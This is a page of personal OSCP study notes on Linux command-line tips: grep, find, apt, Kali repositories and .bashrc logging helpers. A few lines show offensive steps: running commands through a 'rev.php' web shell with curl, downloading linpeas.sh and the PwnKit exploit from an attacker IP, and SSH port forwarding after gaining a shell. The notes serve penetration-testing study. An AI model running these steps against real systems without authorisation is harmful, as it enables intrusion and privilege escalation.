🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Download Linux Image
  • Interactive SSH Prompt
  • URL Encode via curl
  • Wget
  • Chmod
  • Grep
  • Find
  • fzf
  • Files
  • apt
  • Log things you have installed
  • Log only commands that executed successfully
  • Date

Was this helpful?

  1. MISC

Linux

PreviousWebNextApplication Specific

Last updated 2 years ago

Was this helpful?

Download Linux Image

  • The mirror link : is faster than the official download url

Interactive SSH Prompt

~C
# brings ssh> which can be used for port forwarding ( Only after obtaining a shell)

URL Encode via curl

  • URL Encode the values requested via curl

curl -G http://url/rev.php --data-urlencode "cmd=/bin/bash -c 'whoami'"

Wget

  • Wget multiple files with bash expansions

wget http://10.10.14.29/{linpeas.sh,PwnKit}

Chmod

  • Chmod multiple files

# files need to be chmod +x linpeas.sh and PwnKit
chmod +x [lP]*

Grep

  • Avoid multiple patterns in a file

egrep -v '(str1|str2)'

  • Grep Multiple Contents

grep -EInRi --color=always '(str1 | str2)'

  • Keep the grep highlighted color when piping the output

grep --color=always dnoscp whoami.txt | more

Find

  • Exclude specific directories from the find command

find / -writable ! -path '/proc/*' 2>/dev/null

  • Find files with multiple extensions

find . -type f \( -name "*.txt" -o -name "*.xml" \)

fzf

  • Install fzf

sudo apt install fzf

  • Make fzf to interpret the colors

grep --color=always dnoscp whoami.txt | fzf --ansi

Files

  • Know the files location of the services without installing the application

sudo apt install apt-file
apt-file search tomcat # brings all the files related to tomcat (or) the files that contains the string tomcat in its file name

apt

  • Change the default repository for higher speed

# File: /etc/apt/sources.list
# From: deb http://http.kali.org/kali kali-rolling main contrib non-free
# To: deb http://kali.download/kali kali-rolling main contrib non-free

┌──(dnoscp㉿friday)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
# deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://kali.download/kali kali-rolling main contrib non-free

# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

  • Know the version of the application installed from apt with apt-cache policy <packageName>

➜  dhanesh's-device apt-cache policy sudo
sudo:
  Installed: 1.8.31-1ubuntu1.2
  Candidate: 1.8.31-1ubuntu1.2
  Version table:
 *** 1.8.31-1ubuntu1.2 500
        500 http://in.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
        100 /var/lib/dpkg/status
     1.8.31-1ubuntu1 500
        500 http://in.archive.ubuntu.com/ubuntu focal/main amd64 Packages
        500 http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
# sign the kali release
wget -q -O - https://archive.kali.org/archive-key.asc  | apt-key add

# add the repo
echo "deb http://kali.download/kali kali-rolling main contrib non-free" | sudo tee -a /etc/apt/sources.list
sudo apt update

Log things you have installed

  • Add the following function in the .bashrc file

install(){
        echo "sudo apt install -y $@" | tee -a ~/commands.txt &&  cat ~/commands.txt | tail -1 | bash
}

# OR

install(){
        # installation part
        TOOL=$@
        INSTALL="sudo apt install -y $TOOL"
        echo $INSTALL | bash
        ISTATUS=$?

        # logging part
        if [ $ISTATUS == "0" ]; then
                echo "sudo apt install -y $TOOL" >> ~/commands/install.txt
        else
                echo "[-] Installation Error: $TOOL" >> ~/commands/failed.txt
        fi
}

  • Source the file and install new contents with install <packageName> (install xclip)

  • All the installed commands will be available in the ~/install.txt

Log only commands that executed successfully

  • Add the following in the .bashrc file

a(){
        cmd=$@
        echo $cmd | bash 2>/dev/null
        exit=$?

        if [ $exit == "0" ]; then
                echo "$cmd" >> ~/successcommands.txt
        else
                echo "[+] No command found: $cmd"
        fi
}

  • Execute commands with a <command> (a whoami)

  • Only the commands with the successful status code will be logged in the ~/successcommands.txt file

Date

  • Date format with full date and time: date +%F:%T (Mostly used with somecommand | tee $(date +%F:%T).log)

Add Kali Linuxreleases in ubuntu ( Might be slow when installing stuff and also unaware the stability)

⚠️
https://kali.download/base-images/
tomcat-users.xml default location